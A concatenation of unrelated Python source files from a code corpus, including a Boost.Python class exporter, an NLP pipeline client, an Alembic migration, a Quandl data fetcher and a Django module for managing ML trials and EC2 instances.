'Export the name of the class and its class_ statement'
self.Add('template', self.class_.FullName())
name = self.info.rename or self.class_.name
self.Add('constructor', '"%s"' % name)
def ExportBases(self, exported_names):
'Expose the bases of the class into the template section'
bases = self.class_.bases
bases_list = []
for base in bases:
if base.visibility == Scope.public and base.name in exported_names:
bases_list.append(base.name)
if bases_list:
code = namespaces.python + 'bases< %s > ' % \
(', '.join(bases_list))
self.Add('template', code)
def ExportConstructors(self):
'''Exports all the public contructors of the class, plus indicates if the
class is noncopyable.
'''
py_ns = namespaces.python
indent = self.INDENT
def init_code(cons):
'return the init<>() code for the given contructor'
param_list = [p.FullName() for p in cons.parameters]
min_params_list = param_list[:cons.minArgs]
max_params_list = param_list[cons.minArgs:]
min_params = ', '.join(min_params_list)
max_params = ', '.join(max_params_list)
init = py_ns + 'init< '
init += min_params
if max_params:
if min_params:
init += ', '
init += py_ns + ('optional< %s >' % max_params)
init += ' >()'
return init
constructors = [x for x in self.public_members if isinstance(x, Constructor)]
self.constructors = constructors[:]
# don't export the copy constructor if the class is abstract
if self.class_.abstract:
for cons in constructors:
if cons.IsCopy():
constructors.remove(cons)
break
if not constructors:
# declare no_init
self.Add('constructor', py_ns + 'no_init')
else:
# write the constructor with less parameters to the constructor section
smaller = None
for cons in constructors:
if smaller is None or len(cons.parameters) < len(smaller.parameters):
smaller = cons
assert smaller is not None
self.Add('constructor', init_code(smaller))
constructors.remove(smaller)
# write the rest to the inside section, using def()
for cons in constructors:
code = '.def(%s)' % init_code(cons)
self.Add('inside', code)
# check if the class is copyable
if not self.class_.HasCopyConstructor() or self.class_.abstract:
self.Add('template', namespaces.boost + 'noncopyable')
def ExportVariables(self):
'Export the variables of the class, both static and simple variables'
vars = [x for x in self.public_members if isinstance(x, Variable)]
for var in vars:
if self.info[var.name].exclude:
continue
name = self.info[var.name].rename or var.name
fullname = var.FullName()
if var.static:
code = '%s->attr("%s") = %s;' % (self.ScopeName(), name, fullname)
self.Add('scope', code)
else:
if var.type.const:
def_ = '.def_readonly'
else:
def_ = '.def_readwrite'
code = '%s("%s", &%s)' % (def_, name, fullname)
self.Add('inside', code)
printed_policy_warnings = {}
def CheckPolicy(self, m):
'Warns the user if this method needs a policy'
def IsString(type):
return type.const and type.name == 'char' and isinstance(type, PointerType)
needs_policy = isinstance(m.result, (ReferenceType, PointerType))
if IsString(m.result):
needs_policy = False
has_policy = self.info[m.name].policy is not None
if needs_policy and not has_policy:
warning = '---> Error: Method "%s" needs a policy.' % m.FullName()
if warning not in self.printed_policy_warnings:
print warning
print
self.printed_policy_warnings[warning] = 1
def ExportMethods(self):
'Export all the non-virtual methods of this class'
def OverloadName(m):
'Returns the name of the overloads struct for the given method'
return _ID(m.FullName()) + ('_overloads_%i_%i' % (m.minArgs, m.maxArgs))
declared = {}
def DeclareOverloads(m):
'Declares the macro for the generation of the overloads'
if not m.virtual:
func = m.name
code = 'BOOST_PYTHON_MEMBER_FUNCTION_OVERLOADS(%s, %s, %i, %i)\n'
code = code % (OverloadName(m), func, m.minArgs, m.maxArgs)
if code not in declared:
declared[code] = True
self.Add('declaration', code)
def Pointer(m):
'returns the correct pointer declaration for the method m'
# check if this method has a wrapper set for him
wrapper = self.info[method.name].wrapper
if wrapper:
return '&' + wrapper.FullName()
# return normal pointers to the methods of the class
is_unique = self.class_.IsUnique(m.name)
if is_unique:
return '&' + method.FullName()
else:
return method.PointerDeclaration()
def IsExportable(m):
'Returns true if the given method is exportable by this routine'
ignore = (Constructor, ClassOperator, Destructor)
return isinstance(m, Method) and not isinstance(m, ignore) and not m.virtual
methods = [x for x in self.public_members if IsExportable(x)]
for method in methods:
if self.info[method.name].exclude:
continue # skip this method
name = self.info[method.name].rename or method.name
# warn the user if this method needs a policy and doesn't have one
self.CheckPolicy(method)
# check for policies
policy = self.info[method.name].policy or ''
if policy:
policy = ', %s%s()' % (namespaces.python, policy.Code())
# check for overloads
overload = ''
if method.minArgs != method.maxArgs:
# add the overloads for this method
overload_name = OverloadName(method)
DeclareOverloads(method)
overload = ', %s%s()' % (namespaces.pyste, overload_name)
# build the .def string to export the method
pointer = Pointer(method)
code = '.def("%s", %s' % (name, pointer)
code += policy
code += overload
code += ')'
self.Add('inside', code)
# static method
if method.static:
code = '.staticmethod("%s")' % name
self.Add('inside', code)
# add wrapper code if this method has one
wrapper = self.info[method.name].wrapper
if wrapper and wrapper.code:
self.Add('declaration', wrapper.code)
def ExportVirtualMethods(self):
# check if this class has any virtual methods
has_virtual_methods = False
for member in self.class_.members:
if type(member) == Method and member.virtual:
has_virtual_methods = True
break
if has_virtual_methods:
generator = _VirtualWrapperGenerator(self.class_, self.info)
self.Add('template', generator.FullName())
for definition in generator.GenerateDefinitions():
self.Add('inside', definition)
self.Add('declaration', generator.GenerateVirtualWrapper(self.INDENT))
# operators natively supported by boost
BOOST_SUPPORTED_OPERATORS = '+ - * / % ^ & ! ~ | < > == != <= >= << >> && || += -='\
'*= /= %= ^= &= |= <<= >>='.split()
# create a map for faster lookup
BOOST_SUPPORTED_OPERATORS = dict(zip(BOOST_SUPPORTED_OPERATORS, range(len(BOOST_SUPPORTED_OPERATORS))))
# a dict of operators that are not directly supported by boost, but can be exposed
# simply as a function with a special signature
BOOST_RENAME_OPERATORS = {
'()' : '__call__',
}
# converters which has a special name in python
SPECIAL_CONVERTERS = {
'double' : '__float__',
'float' : '__float__',
'int' : '__int__',
'long' : '__long__',
}
def ExportOperators(self):
'Export all member operators and free operators related to this class'
def GetFreeOperators():
'Get all the free (global) operators related to this class'
operators = []
for decl in self.declarations:
if isinstance(decl, Operator):
# check if one of the params is this class
for param in decl.parameters:
if param.name == self.class_.FullName():
operators.append(decl)
break
return operators
def GetOperand(param):
'Returns the operand of this parameter (either "self", or "other<type>")'
if param.name == self.class_.FullName():
return namespaces.python + 'self'
else:
return namespaces.python + ('other< %s >()' % param.name)
def HandleSpecialOperator(operator):
# gatter information about the operator and its parameters
result_name = operator.result.name
param1_name = ''
if operator.parameters:
param1_name = operator.parameters[0].name
# check for str
ostream = 'basic_ostream'
is_str = result_name.find(ostream) != -1 and param1_name.find(ostream) != -1
if is_str:
namespace = namespaces.python + 'self_ns::'
self_ = namespaces.python + 'self'
return '.def(%sstr(%s))' % (namespace, self_)
# is not a special operator
return None
frees = GetFreeOperators()
members = [x for x in self.public_members if type(x) == ClassOperator]
all_operators = frees + members
operators = [x for x in all_operators if not self.info['operator'][x.name].exclude]
for operator in operators:
# gatter information about the operator, for use later
wrapper = self.info['operator'][operator.name].wrapper
if wrapper:
pointer = '&' + wrapper.FullName()
if wrapper.code:
self.Add('declaration', wrapper.code)
elif isinstance(operator, ClassOperator) and self.class_.IsUnique(operator.name):
pointer = '&' + operator.FullName()
else:
pointer = operator.PointerDeclaration()
rename = self.info['operator'][operator.name].rename
# check if this operator will be exported as a method
export_as_method = wrapper or rename or operator.name in self.BOOST_RENAME_OPERATORS
# check if this operator has a special representation in boost
special_code = HandleSpecialOperator(operator)
has_special_representation = special_code is not None
if export_as_method:
# export this operator as a normal method, renaming or using the given wrapper
if not rename:
if wrapper:
rename = wrapper.name
else:
rename = self.BOOST_RENAME_OPERATORS[operator.name]
policy = ''
policy_obj = self.info['operator'][operator.name].policy
if policy_obj:
policy = ', %s()' % policy_obj.Code()
self.Add('inside', '.def("%s", %s%s)' % (rename, pointer, policy))
elif has_special_representation:
self.Add('inside', special_code)
elif operator.name in self.BOOST_SUPPORTED_OPERATORS:
# export this operator using boost's facilities
op = operator
is_unary = isinstance(op, Operator) and len(op.parameters) == 1 or\
isinstance(op, ClassOperator) and len(op.parameters) == 0
if is_unary:
self.Add('inside', '.def( %s%sself )' % \
(operator.name, namespaces.python))
else:
# binary operator
if len(operator.parameters) == 2:
left_operand = GetOperand(operator.parameters[0])
right_operand = GetOperand(operator.parameters[1])
else:
left_operand = namespaces.python + 'self'
right_operand = GetOperand(operator.parameters[0])
self.Add('inside', '.def( %s %s %s )' % \
(left_operand, operator.name, right_operand))
# export the converters.
# export them as simple functions with a pre-determined name
converters = [x for x in self.public_members if type(x) == ConverterOperator]
def ConverterMethodName(converter):
result_fullname = converter.result.name
if result_fullname in self.SPECIAL_CONVERTERS:
return self.SPECIAL_CONVERTERS[result_fullname]
else:
# extract the last name from the full name
result_name = _ID(result_fullname.split('::')[-1])
return 'to_' + result_name
for converter in converters:
info = self.info['operator'][converter.result.name]
# check if this operator should be excluded
if info.exclude:
continue
special_code = HandleSpecialOperator(converter)
if info.rename or not special_code:
# export as method
name = info.rename or ConverterMethodName(converter)
if self.class_.IsUnique(converter.name):
pointer = '&' + converter.FullName()
else:
pointer = converter.PointerDeclaration()
policy_code = ''
if info.policy:
policy_code = ', %s()' % info.policy.Code()
self.Add('inside', '.def("%s", %s%s)' % (name, pointer, policy_code))
elif special_code:
self.Add('inside', special_code)
def ExportNestedClasses(self, exported_names):
nested_classes = [x for x in self.public_members if isinstance(x, NestedClass)]
for nested_class in nested_classes:
nested_info = self.info[nested_class.name]
nested_info.include = self.info.include
nested_info.name = nested_class.FullName()
exporter = ClassExporter(nested_info)
exporter.SetDeclarations(self.declarations + [nested_class])
codeunit = CodeUnit(None)
exporter.Export(codeunit, exported_names)
self.nested_codeunits.append(codeunit)
def ExportNestedEnums(self):
nested_enums = [x for x in self.public_members if isinstance(x, ClassEnumeration)]
for enum in nested_enums:
enum_info = self.info[enum.name]
enum_info.include = self.info.include
enum_info.name = enum.FullName()
exporter = EnumExporter(enum_info)
exporter.SetDeclarations(self.declarations + [enum])
codeunit = CodeUnit(None)
exporter.Export(codeunit, None)
self.nested_codeunits.append(codeunit)
def _ID(name):
'Returns the name as a valid identifier'
for invalidchar in ('::', '<', '>', ' ', ','):
name = name.replace(invalidchar, '_')
# avoid duplications of '_' chars
names = [x for x in name.split('_') if x]
return '_'.join(names)
#==============================================================================
# Virtual Wrapper utils
#==============================================================================
def _ParamsInfo(m, count=None):
if count is None:
count = len(m.parameters)
param_names = ['p%i' % i for i in range(count)]
param_types = [x.FullName() for x in m.parameters[:count]]
params = ['%s %s' % (t, n) for t, n in zip(param_types, param_names)]
#for i, p in enumerate(m.parameters[:count]):
# if p.default is not None:
# #params[i] += '=%s' % p.default
# params[i] += '=%s' % (p.name + '()')
params = ', '.join(params)
return params, param_names, param_types
class _VirtualWrapperGenerator(object):
'Generates code to export the virtual methods of the given class'
def __init__(self, class_, info):
self.class_ = class_
self.info = info
self.wrapper_name = _ID(class_.FullName()) + '_Wrapper'
def DefaultImplementationNames(self, method):
'''Returns a list of default implementations for this method, one for each
number of default arguments. Always returns at least one name, and return from
the one with most arguments to the one with the least.
'''
base_name = 'default_' + method.name
minArgs = method.minArgs
maxArgs = method.maxArgs
if minArgs == maxArgs:
return [base_name]
else:
return [base_name + ('_%i' % i) for i in range(minArgs, maxArgs+1)]
def Declaration(self, method, indent):
'''Returns a string with the declarations of the virtual wrapper and
its default implementations. This string must be put inside the Wrapper
body.
'''
pyste = namespaces.pyste
python = namespaces.python
rename = self.info[method.name].rename or method.name
result = method.result.FullName()
return_str = 'return '
if result == 'void':
return_str = ''
params, param_names, param_types = _ParamsInfo(method)
constantness = ''
if method.const:
constantness = ' const'
# call_method callback
decl = indent + '%s %s(%s)%s {\n' % (result, method.name, params, constantness)
param_names_str = ', '.join(param_names)
if param_names_str:
param_names_str = ', ' + param_names_str
decl += indent*2 + '%s%scall_method< %s >(self, "%s"%s);\n' %\
(return_str, python, result, rename, param_names_str)
decl += indent + '}\n'
# default implementations (with overloading)
# only for classes that are not abstract, and public methods
if not method.abstract and method.visibility == Scope.public:
minArgs = method.minArgs
maxArgs = method.maxArgs
impl_names = self.DefaultImplementationNames(method)
for impl_name, argNum in zip(impl_names, range(minArgs, maxArgs+1)):
params, param_names, param_types = _ParamsInfo(method, argNum)
decl += '\n'
decl += indent + '%s %s(%s)%s {\n' % (result, impl_name, params, constantness)
decl += indent*2 + '%s%s::%s(%s);\n' % \
(return_str, self.class_.FullName(), method.name, ', '.join(param_names))
decl += indent + '}\n'
return decl
def MethodDefinition(self, method):
'''Returns a list of lines, which should be put inside the class_
statement to export this method.'''
# dont define abstract methods
pyste = namespaces.pyste
rename = self.info[method.name].rename or method.name
default_names = self.DefaultImplementationNames(method)
class_name = self.class_.FullName()
wrapper_name = pyste + self.wrapper_name
result = method.result.FullName()
is_method_unique = self.class_.IsUnique(method.name)
constantness = ''
if method.const:
constantness = ' const'
# create a list of default-impl pointers
minArgs = method.minArgs
maxArgs = method.maxArgs
if is_method_unique:
default_pointers = ['&%s::%s' % (wrapper_name, x) for x in default_names]
else:
default_pointers = []
for impl_name, argNum in zip(default_names, range(minArgs, maxArgs+1)):
param_list = [x.FullName() for x in method.parameters[:argNum]]
params = ', '.join(param_list)
signature = '%s (%s::*)(%s)%s' % (result, wrapper_name, params, constantness)
default_pointer = '(%s)%s::%s' % (signature, wrapper_name, impl_name)
default_pointers.append(default_pointer)
# get the pointer of the method
if is_method_unique:
pointer = '&' + method.FullName()
else:
pointer = method.PointerDeclaration()
# generate the defs
definitions = []
# basic def
definitions.append('.def("%s", %s, %s)' % (rename, pointer, default_pointers[-1]))
for default_pointer in default_pointers[:-1]:
definitions.append('.def("%s", %s)' % (rename, default_pointer))
return definitions
def FullName(self):
return namespaces.pyste + self.wrapper_name
def VirtualMethods(self):
def IsVirtual(m):
return type(m) == Method and m.virtual
return [m for m in self.class_.members if IsVirtual(m)]
def Constructors(self):
def IsValid(m):
return isinstance(m, Constructor) and m.visibility == Scope.public
return [m for m in self.class_.members if IsValid(m)]
def GenerateDefinitions(self):
defs = []
for method in self.VirtualMethods():
exclude = self.info[method.name].exclude
# generate definitions only for public methods and non-abstract methods
if method.visibility == Scope.public and not method.abstract and not exclude:
defs.extend(self.MethodDefinition(method))
return defs
def GenerateVirtualWrapper(self, indent):
'Return the wrapper for this class'
# generate the class code
class_name = self.class_.FullName()
code = 'struct %s: %s\n' % (self.wrapper_name, class_name)
code += '{\n'
# generate constructors (with the overloads for each one)
for cons in self.Constructors(): # only public constructors
minArgs = cons.minArgs
maxArgs = cons.maxArgs
# from the min number of arguments to the max number, generate
# all version of the given constructor
cons_code = ''
for argNum in range(minArgs, maxArgs+1):
params, param_names, param_types = _ParamsInfo(cons, argNum)
if params:
params = ', ' + params
cons_code += indent + '%s(PyObject* self_%s):\n' % \
(self.wrapper_name, params)
cons_code += indent*2 + '%s(%s), self(self_) {}\n\n' % \
(class_name, ', '.join(param_names))
code += cons_code
# generate the body
body = []
for method in self.VirtualMethods():
if not self.info[method.name].exclude:
body.append(self.Declaration(method, indent))
body = '\n'.join(body)
code += body + '\n'
# add the self member
code += indent + 'PyObject* self;\n'
code += '};\n'
return code
| StarcoderdataPython |
3382439 | <reponame>farzamfan/NLP-Pipeline<filename>nlpipe/Clients/client.py
import logging
import os
import argparse
import sys
from nlpipe.Clients.HTTPClient import HTTPClient
def get_client(server_name, token=None):
"""
Returns a client (for now only HTTP client)
:param server_name: address of the server (URL)
:param token: authentication token
:return: initialized HTTP client
"""
if server_name.startswith("http:") or server_name.startswith("https:"): # if the server is remote
logging.getLogger('requests').setLevel(logging.WARNING) # logging
if not token:
token = os.environ.get('NLPIPE_TOKEN', None) # authentication token
logging.debug("Connecting to REST server at {server_name} using token={}".format(bool(token), **locals()))
return HTTPClient(server_name, token=token)
if __name__ == '__main__': # if run as a module
parser = argparse.ArgumentParser()
parser.add_argument("server", help="Server hostname or directory location")
parser.add_argument("tool", help="Tool name") # NLP processing tool
parser.add_argument("--verbose", "-v", help="Verbose (debug) output", action="store_true", default=False)
parser.add_argument("--token", "-t", help="Provide auth token"
"(default reads ./.nlpipe_token or NLPIPE_TOKEN")
action_parser = parser.add_subparsers(dest='action', title='Actions') # parser for actions
action_parser.required = True
actions = {name: action_parser.add_parser(name) # add possible actions
for name in ('doc_status', 'result', 'check', 'process', 'process_inline',
'bulk_status', 'bulk_result', 'store_result', 'store_error')}
for action in 'doc_status', 'result', 'store_result', 'store_error':
actions[action].add_argument('doc_id', help="Document ID")
for action in 'bulk_status', 'bulk_result':
actions[action].add_argument('ids', nargs="+", help="Document IDs")
for action in 'result', 'process_inline', 'bulk_result':
actions[action].add_argument("--return_format", help="Optional output format to retrieve") # return format
for action in 'process', 'process_inline':
actions[action].add_argument('doc', help="Document to process (use - to read from stdin")
actions[action].add_argument('doc_id', nargs="?", help="Optional explicit document ID")
for action in ('store_result', 'store_error'):
actions[action].add_argument('result', help="Document to store (use - to read from stdin")
args = vars(parser.parse_args()) # turn to dict so we can pop and pass the rest as kargs
logging.basicConfig(level=logging.DEBUG if args.pop('verbose', False) else logging.INFO,
format='[%(asctime)s %(name)-12s %(levelname)-5s] %(message)s')
client = get_client(args.pop('server'), token=args.pop('token', None)) # add HTTP client
for doc_arg in ('doc', 'result'):
if args.get(doc_arg) == '-':
args[doc_arg] = sys.stdin.read()
action = args.pop('action') # requested action
args = {k: v for (k, v) in args.items() if v}
result = getattr(client, action)(**args) # run the action via the HTTP client
if action == "get_task": # in case a task is given
doc_id, doc = result
if doc_id is not None:
print(doc_id, file=sys.stderr)
print(doc)
elif action in ("store_result", "store_error"):
pass
else:
if result is not None:
print(result)
| StarcoderdataPython |
1667214 | <reponame>muctadir/labeling-machine<filename>webapp/migrations/versions/f2321be6f3e5_description_for_each_label.py
"""description for each label
Revision ID: f<PASSWORD>
Revises: <PASSWORD>
Create Date: 2022-02-17 19:17:09.417982
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f<PASSWORD>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Label") as batch_op:
batch_op.add_column(sa.Column('label_description', sa.Text(), nullable=True))
batch_op.drop_column('remark')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Label") as batch_op:
batch_op.add_column(sa.Column('remark', sa.TEXT(), nullable=True))
batch_op.drop_column('label_description')
# ### end Alembic commands ###
| StarcoderdataPython |
115457 | """ Quandl Model """
__docformat__ = "numpy"
import logging
import pandas as pd
import quandl
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.decorators import log_start_end
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def get_short_interest(ticker: str, nyse: bool) -> pd.DataFrame:
"""Plots the short interest of a stock. This corresponds to the
number of shares that have been sold short but have not yet been
covered or closed out. Either NASDAQ or NYSE [Source: Quandl]
Parameters
----------
ticker : str
ticker to get short interest from
nyse : bool
data from NYSE if true, otherwise NASDAQ
Returns
----------
pd.DataFrame
short interest volume data
"""
quandl.ApiConfig.api_key = cfg.API_KEY_QUANDL
if nyse:
return quandl.get(f"FINRA/FNYX_{ticker}")
return quandl.get(f"FINRA/FNSQ_{ticker}")
| StarcoderdataPython |
3294115 | <reponame>RJT1990/mantra<filename>mantraml/ui/core/models.py
import boto3
from collections import Counter
import datetime
import os
import shutil
import yaml
from django.db import models
from .consts import MANTRA_DEVELOPMENT_TAG_NAME
from .mantra import Mantra
from .forms import StartInstanceForm, StopInstanceForm, TerminateInstanceForm
class Cloud:
@classmethod
def change_instance_state(cls, ec2_resource, POST):
"""
This method changes the state of an instance based on the request of an instance form view.
Parameters
------------
ec2_resource - boto3.resource('ec2') instance
The EC2 connection
POST - request.POST object
Containing the form information
"""
if 'stop_instance_id' in POST.dict():
posted_form = StopInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['stop_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).stop()
elif 'start_instance_id' in POST.dict():
posted_form = StartInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['start_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).start()
else:
posted_form = TerminateInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['terminate_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).terminate()
@classmethod
def get_instance_metadata(cls, instances, no_dev=False):
"""
This method obtains instance metadata from a list of instances
Parameters
------------
instances - ec2.instances.filter object
EC2 instance filter
no_dev - bool
If True, excludes development instances.
Returns
------------
list of dicts - list of instance metadata
"""
instance_data = []
for instance in instances:
instance_dict = {}
if instance.tags:
instance_dict['name'] = instance.tags[0]['Value']
else:
instance_dict['name'] = ''
instance_dict['type'] = instance.instance_type
instance_dict['id'] = instance.id
instance_dict['tags'] = []
instance_dict['state'] = instance.state['Name']
instance_dict['launch_time'] = instance.launch_time
if no_dev:
if instance_dict['name'] != MANTRA_DEVELOPMENT_TAG_NAME:
instance_data.append(instance_dict)
else:
if instance_dict['name'] == MANTRA_DEVELOPMENT_TAG_NAME:
instance_dict['tags'] += ['development']
instance_data.append(instance_dict)
return instance_data
class Trial:
column_names = ['start_timestamp', 'folder_name', 'trial_hash', 'trial_group_hash', 'model_name', 'model_hash', 'data_name', 'data_hash', 'task_name', 'task_hash']
@classmethod
def get_trial_contents(cls, settings):
"""
This method opens the TRIALS metadata file in the .mantra folder and obtains each row of trial metadata
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
list - list of trials each being a list of metadata (str format)
"""
trial_information = open("%s/.mantra/TRIALS" % settings.MANTRA_PROJECT_ROOT, 'r').read()
return [line.split(" ") for line in trial_information.split("\n") if line]
@classmethod
def get_trial_contents_as_dicts(cls, settings):
"""
This method opens the TRIALS metadata file in the .mantra folder and obtains each row of trial metadata.
It then converts this data into a list of dictionaries, where the keys come from Trial.column_names
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
list of dicts - each dictionary containing keys (cls.column_names) and values (from the file)
"""
trial_contents = cls.get_trial_contents(settings=settings)
return [dict(zip(cls.column_names, content)) for content in trial_contents]
@classmethod
def remove_group_hash_from_contents(cls, settings, trial_group_hash):
"""
This method takes a trial contents object - a list of metadata - and removes rows where the group trial hash == trial_group_hash
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
group_trial_hash - str
The hash of a group trial
"""
trial_contents = cls.get_trial_contents(settings=settings)
new_contents = [trial for trial in trial_contents if not trial[3] == trial_group_hash]
trial_folder_names = [trial[1] for trial in trial_contents if trial[3] == trial_group_hash]
new_information = '\n'.join([" ".join(content) for content in new_contents]) + '\n'
for trial_folder in trial_folder_names:
try:
shutil.rmtree('%s/%s/%s' % (settings.MANTRA_PROJECT_ROOT, 'trials', trial_folder)) # delete the trial folder
except FileNotFoundError:
continue # if it's not there, it's already deleted, so we can proceed to try to solely remove from TRIALS file
with open("%s/.mantra/TRIALS" % settings.MANTRA_PROJECT_ROOT, "w") as trial_file:
trial_file.write(new_information)
@classmethod
def get_trial_group_members(cls, settings, model_filter=None, data_filter=None):
"""
This method takes a trial contents object - a list of metadata - and removes rows where the group trial hash == trial_group_hash
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
model_filter - None or str
If str, will filter the trials so that the trial['model_name'] == model_filter
data_filter - None or str
If str, will filter the trials so that the trial['data_name'] == data_filter
Returns
------------
dict - key is a trial group hash, value is a list of trials (dict metadata) that correspond to that trial group hash
list - of trials
"""
trials = cls.get_trial_contents_as_dicts(settings=settings)
if model_filter:
trials = [trial for trial in trials if trial['model_name'] == model_filter]
elif data_filter:
trials = [trial for trial in trials if trial['data_name'] == data_filter]
trial_group_hashs = list(set([model['trial_group_hash'] for model in trials]))
trial_group_dict = {trial_group_hash: [trial for trial in trials if trial['trial_group_hash'] == trial_group_hash] for trial_group_hash in trial_group_hashs}
return trial_group_dict, trials
@classmethod
def get_trial_group_name_dict(cls, settings):
"""
This method retrieves a dictionary with keys as trial group names, and values as string names for these ids. E.g.:
{'ae42j2ff42f2jeduj4': 'Dropout Experiments'}
This allows for trial groups to be named with human names, rather than dehumanising SHA-256 hashes.
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
dict - key is a trial group hash, value is a name for the trial group e.g. "Learning Rate Tests"
"""
with open("%s/.mantra/TRIAL_GROUP_NAMES" % settings.MANTRA_PROJECT_ROOT, "r") as trial_group_name_file:
yaml_content = yaml.load(trial_group_name_file)
if not yaml_content:
yaml_content = {}
return yaml_content
@staticmethod
def get_trial_group_name(trial_group_name_dict, trial_group_hash):
"""
Parameters
------------
trial_group_name_dict - dict
The dictionary containing as keys trial group hashes, and as values trial group names, e.g. "Dropout Experiments"
trial_group_hash - str
The string for the trial group hash, e.g. a93idjj4v2ojf42of24cew...
Returns
------------
str - the name of the trial group given the dictionary and the hash entered
"""
try:
return trial_group_name_dict[trial_group_hash]
except KeyError:
return trial_group_hash[:6]
@classmethod
def get_trial_group_metadata(cls, settings, hash, trial_groups):
"""
This method obtains trial group metadata from a list of trial group dictionaries
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
hash - str
The hash for the trial group
trial_groups - list
List of dicts, where each dict contains metadata on a trial
Returns
------------
dict - containing metadata on the trial group
"""
yaml_content = Trial.get_trial_group_name_dict(settings=settings)
latest_trial_time = datetime.datetime.utcfromtimestamp(int(str(max([trial['start_timestamp'] for trial in trial_groups]))))
trial_group_metadata = {}
if not trial_groups:
return trial_group_metadata
example_trial = trial_groups[0]
for metadata_name in ['trial_group_hash', 'folder_name', 'model_name', 'model_hash', 'data_name', 'task_name', 'task_hash', 'data_hash']:
trial_group_metadata[metadata_name] = example_trial[metadata_name]
try:
dataset_metadata = Mantra.find_dataset_metadata(example_trial['data_name'])
except ImportError:
return {}
task_metadata = Mantra.find_task_metadata(example_trial['task_name'])
trial_group_metadata['time'] = latest_trial_time
trial_group_metadata['timestamp'] = latest_trial_time.timestamp()
trial_group_metadata['model_metadata'] = Mantra.find_model_metadata(trial_group_metadata['model_name'])
trial_group_metadata['trial_group_name'] = Trial.get_trial_group_name(yaml_content, example_trial['trial_group_hash'])
trial_group_metadata['latest_media'] = Mantra.find_latest_trial_media(trial_group_metadata['folder_name'])
trial_group_metadata['data_full_name'] = dataset_metadata['name']
trial_group_metadata['task_full_name'] = task_metadata['name']
trial_group_metadata['data_image'] = dataset_metadata['data_image']
trial_group_metadata['n_trials'] = len(trial_groups)
return trial_group_metadata
@classmethod
def get_all_trial_group_metadata(cls, settings, trial_group_members):
"""
This method obtains trial group metadata from a dictionary containing core trial group metadata
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
trial_group_members - dict
Keys are trial group hashes; values are list of trial dictionaries corresponding to that trial group
Returns
------------
list of dicts - each containing metadata on the trial group
"""
trial_group_metadata = [cls.get_trial_group_metadata(
settings=settings,
hash=trial_group_hash,
trial_groups=trial_groups) for trial_group_hash, trial_groups in trial_group_members.items()]
return [group for group in trial_group_metadata if group]
class Artefact:
@classmethod
def all(cls, settings, artefacts_folder):
"""
This method obtains a list of all artefacts in the artefact folder provided
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
artefacts_folder -
Path of the folder where the artefact folders are located
Returns
------------
list of strs - the name of each artefact found in the artefacts_folder path
"""
artefacts_dir = os.path.join(settings.MANTRA_PROJECT_ROOT, artefacts_folder)
if os.path.isdir(artefacts_dir):
artefacts_list = [o for o in os.listdir(artefacts_dir) if os.path.isdir(os.path.join(artefacts_dir, o))]
else:
artefacts_list = []
return artefacts_list
class Task:
@classmethod
def calculate_task_metadata(cls, settings, trials):
"""
This method produces a dictionary of tasks, with keys as the task names, which contain dictionaries of metadata such as the model
with the best loss.
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
trials - list of dicts
Each dictionary containing trial metadata
Returns
------------
dict - keys as task names, values as dictionaries containing metadata on each task
"""
tasks_used = [trial['task_name'] for trial in trials if trial['task_name'] != 'none']
occur = Counter(tasks_used)
task_dict = dict(occur) # e.g. {'task_1': 6} - is a way for us to count the number of trials for each task
for task_name, n_trials in task_dict.items():
task_dict[task_name] = {'n_trials': n_trials}
task_dict[task_name].update(Mantra.find_task_metadata(task_name))
task_trials = [trial for trial in trials if trial['task_name'] == task_name]
for task_trial in task_trials:
try:
task_trial['trial_metadata'] = yaml.load(open('%s/trials/%s/trial_metadata.yml' % (settings.MANTRA_PROJECT_ROOT, task_trial['folder_name']), 'r').read())
except: # can't load yaml
task_trial['trial_metadata'] = {}
try:
trials_with_validation_loss = [trial for trial in task_trials if 'validation_loss' in trial['trial_metadata']]
task_dict[task_name]['best_loss'] = min([trial['trial_metadata']['validation_loss'] for trial in trials_with_validation_loss])
task_dict[task_name]['best_model_folder'] = [trial for trial in trials_with_validation_loss if trial['trial_metadata']['validation_loss'] == task_dict[task_name]['best_loss']][0]['model_name']
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
except AttributeError:
task_dict[task_name]['best_loss'] = None
task_dict[task_name]['best_model_folder'] = None
if task_dict[task_name]['best_model_folder'] is not None:
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
else:
task_dict[task_name]['best_model_metadata'] = None
except ValueError:
task_dict[task_name]['best_loss'] = None
task_dict[task_name]['best_model_folder'] = None
if task_dict[task_name]['best_model_folder'] is not None:
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
else:
task_dict[task_name]['best_model_metadata'] = None
return task_dict
| StarcoderdataPython |
1699118 | # Should match the matlab version
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal
A = np.array([[0.0, 1.0], [0.0, -10.0/100]])
B = np.array([[0.0], [1.0/100.0]])
C = np.array([1.0, 0.0])
D = np.array([0.0])
